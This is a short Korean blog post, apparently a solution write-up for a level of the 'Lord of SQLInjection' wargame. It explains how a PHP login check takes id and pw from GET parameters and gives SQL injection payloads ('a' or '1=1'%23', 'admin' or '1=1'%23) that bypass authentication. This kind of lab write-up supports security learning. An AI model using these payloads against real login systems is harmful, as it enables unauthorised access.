DB정보를 SQL쿼리문을 이용하여 id와 pw가 일치하는지 확인하는 코드이다.
$_GET[id] $_GET[pw] get을 통해 값을 얻어 주소창에 값을 전달 할 수 있다.
id에는 아무 값이나 넣고 pw를 1=1 0=0 등 참이 되도록 하는 방법 등이 있다
정답
?id=a' or '1=1'%23
?id=admin' or '1=1'%23
작은 따옴표가 왜 저렇게 붙는지는 아직 모르겠다..
'보안 > 웹해킹' 카테고리의 다른 글
| [lord of SQLinjection] darkelf 문제풀이 (0) | 2021.08.04 |
|---|---|
| [lord of SQLinjection] wolfman 문제풀이 (0) | 2021.08.04 |
| [lord of SQLinjection] orc 문제풀이 (0) | 2021.07.30 |
| [lord of SQLinjection] goblin 문제풀이 (0) | 2021.07.30 |
| [lord of SQLinjection] cobolt 문제풀이 (0) | 2021.07.30 |